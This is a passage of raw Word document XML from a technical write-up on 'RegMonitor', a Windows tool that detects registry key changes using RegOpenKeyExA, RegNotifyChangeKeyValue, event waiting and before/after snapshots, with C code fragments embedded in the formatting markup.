          <w:p w:rsidR="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B91AB3">
            <w:r>
              <w:t>REG_NOTIFY_CHANGE _LAST_SET</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B91AB3">
            <w:r>
              <w:t>0x00000004L</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5950" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B0640C">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00B91AB3">
              <w:t>Notify the caller of changes to a value of the key. This can include adding or deleting a value, or changing an existing value.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B91AB3" w:rsidTr="00B91AB3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2820" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B91AB3">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>REG_NOTIFY_CHANGE _SECURITY</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B91AB3">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>0x00000008L</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5950" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B91AB3">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00B91AB3">
              <w:t>Notify the caller of changes to the security descriptor of the key.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B91AB3" w:rsidRDefault="00B91AB3" w:rsidP="00B91AB3">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="_Toc485303804"/>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00A91688">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A91688">
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A91688">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A91688">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00A91688">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A91688">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A91688">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A91688">
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A91688">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A91688">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A91688">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dwFilter values and their meanings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:p w:rsidR="00B0640C" w:rsidRDefault="00B91AB3" w:rsidP="00B91AB3">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId50" w:history="1">
        <w:r w:rsidRPr="00224EDD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://msdn.microsoft.com/en-us/library/windows/desktop/ms724892(v=vs.85).aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B91AB3" w:rsidRDefault="000D4E08" w:rsidP="00B91AB3">
      <w:r>
        <w:t xml:space="preserve">RegMonitor creates 2 Registry Handle for storing 2 parts of the parsed key. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D4E08" w:rsidRDefault="000D4E08" w:rsidP="000D4E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HKEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">   hMainKey;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D4E08" w:rsidRDefault="000D4E08" w:rsidP="000D4E08">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HKEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">   hKey;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D4E08" w:rsidRDefault="00401671" w:rsidP="000D4E08">
      <w:r>
        <w:t xml:space="preserve">The handle variable hMainKey is used to store a handle value for the specified main key. Since </w:t>
      </w:r>
      <w:r w:rsidR="006235EF">
        <w:t xml:space="preserve">Windows API does not used strings (like HKLM, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="006235EF">
        <w:t>HKCU,…</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006235EF">
        <w:t>) for working with Registry, we have to map these strings into Registry Handle values.</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Convert parameters to appropriate handles.</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strcmp(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"HKLM"</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HKEY_LOCAL_MACHINE</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strcmp(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"HKU"</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HKEY_USERS</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strcmp(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"HKCU"</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HKEY_CURRENT_USER</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strcmp(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"HKCR"</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HKEY_CLASSES_ROOT</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strcmp(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"HCC"</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HKEY_CURRENT_CONFIG</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sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>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"Usage: notify [HKLM|HKU|HKCU|HKCR|HCC] [&lt;subkey&gt;]\n"</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6235EF" w:rsidRDefault="006235EF" w:rsidP="006235EF">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sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006235EF" w:rsidRDefault="00350C9B" w:rsidP="006235EF">
      <w:r>
        <w:t>Depends on the main key value stored in “achMainKey”, RegMonitor map</w:t>
      </w:r>
      <w:r w:rsidR="001A6FED">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to a regist</w:t>
      </w:r>
      <w:r w:rsidR="001A6FED">
        <w:t>ry handle value and stores it in hMainKey.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A69C8" w:rsidRDefault="00D42C86" w:rsidP="006235EF">
      <w:r>
        <w:t xml:space="preserve">RegMonitor later reads the key using </w:t>
      </w:r>
      <w:r w:rsidR="004A69C8">
        <w:t>a function called “RegOpenKeyExA” for opening the key using 3 primary values:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A69C8" w:rsidRDefault="004A69C8" w:rsidP="004A69C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>hMainKey: a handle point to a specified root key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A69C8" w:rsidRDefault="004A69C8" w:rsidP="004A69C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>achSubKey: a string storing the subkey. This subkey belongs to the root key above.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00152570" w:rsidRDefault="004A69C8" w:rsidP="00152570">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>hKey: a handle that stores the returned registry key handle for the opened key.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Open and read specified registry key.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lErrorCode = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>RegOpenKeyExA(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">hMainKey,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achSubKey,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KEY_NOTIFY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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>KEY_READ</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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>KEY_QUERY_VALUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">,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&amp;hKey);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lErrorCode !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ERROR_SUCCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</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"Error in RegOpenKeyEx (%d).\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, lErrorCode);</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152570" w:rsidRDefault="00152570" w:rsidP="00152570">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45C09" w:rsidRDefault="00245C09" w:rsidP="00D17EE5">
      <w:r>
        <w:t>For identifying changes that happened to the registry, RegMonitor calls RegQuery twice. At the first call, RegQuery snapshots the specified registry key using the “hKey” handle and return the current number of the subkey and value belonging to that monitored key. Along to those numbers, RegQuery also return names of the last subkey and the last value in Registry subkey and value chains.</w:t>
      </w:r>
      <w:r w:rsidR="00D17EE5">
        <w:t xml:space="preserve"> We will discuss about RegQuery in the following section.</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//Snapshot Registry Before Change</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RegQuery(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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//Handle to registry key which is being monitored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hKey,</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//The number of current subkey that will be returned.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&amp;nSubKeys,</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//The number of current value that will be returned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&amp;nValues,</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//Indicate whether there is any change happened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FALSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>,</w:t>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achMainKey, </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achSubKey,</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//Name of last subkey in subkey chain</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lpLastSubkeyName,</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//Name of last value in value chain</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lpLastValueName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>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DF6B0B" w:rsidRDefault="00DF6B0B" w:rsidP="00D17EE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>RegMonitor creates an event and calls a Windows API named “RegNotifyChange KeyValue”. RegNotifyChangeKeyValue takes 3 primary arguments:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6B0B" w:rsidRDefault="00DF6B0B" w:rsidP="00DF6B0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>hKey: The current monitored registry key handle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6B0B" w:rsidRDefault="00DF6B0B" w:rsidP="00DF6B0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>dwFilter: The DWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6B0B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>variable store information for which activity to be monitored.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B1D4D" w:rsidRDefault="005B1D4D" w:rsidP="005B1D4D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>hEvent: An Event Handle for RegNotifyChangeKeyValue to capture for registry event.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    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// Create an event.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hEvent = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CreateEvent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>FALSE</w:t>
      </w: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(hEvent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"Error in CreateEvent (%d).\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, GetLastError());</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Watch the registry key for a change of value.</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lErrorCode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 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>RegNotifyChangeKeyValue(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">hKey,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dwFilter,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hEvent,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TRUE</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lErrorCode !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ERROR_SUCCESS</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"Error in RegNotifyChangeKeyValue (%d).\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, lErrorCode);</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5B1D4D" w:rsidRDefault="005B1D4D" w:rsidP="005B1D4D">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5B1D4D">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D72550" w:rsidRDefault="00D72550" w:rsidP="005B1D4D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>RegMonitor stands still and waits for registry event happen by using hEvent specified by RegNotifyChangeKeyValue.</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Wait for an event to occur.</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"Waiting for a change in the specified key...\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</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WaitForSingleObject(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">hEvent, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>INFINITE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">) == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>WAIT_FAILED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</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"Error in WaitForSingleObject (%d).\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, GetLastError());</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"\nChange has occurred.\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7"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D92F46" w:rsidRDefault="00541694" w:rsidP="00D92F46">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When WaitForSingleObject return, if the return value is not WAIT_FAILED (which is set to 0xFFFFFFFF), there could have been an event happened in the registry database. RegMonitor calls RegQuery for capturing another snapshot, and comparing it with the previous one to identify change which takes place.</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xml:space="preserve">//Snapshot Registry in case event occurs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RegQuery(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">hKey,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&amp;nSubKeys,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&amp;nValues,</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This value is now set to TRUE</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Indicating there was change happened</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achMainKey,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achSubKey,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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">lpLastSubkeyName,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lpLastValueName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541694" w:rsidRDefault="00541694" w:rsidP="00541694">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rsidR="00541694" w:rsidRDefault="00541694" w:rsidP="00541694">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A77FD" w:rsidRDefault="000A77FD" w:rsidP="00541694">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A77FD" w:rsidRDefault="000A77FD" w:rsidP="000A77FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A77FD">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t>RegQuery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA32A4" w:rsidRDefault="00BA32A4" w:rsidP="000A77FD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>RegQuery is a function for querying the information stored in a specified registry key.</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RegQuery(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HKEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hKey</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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>nSubKeys</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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>nValues</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bool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>aft</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const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>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achMainKey</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const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>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achSubKey</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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
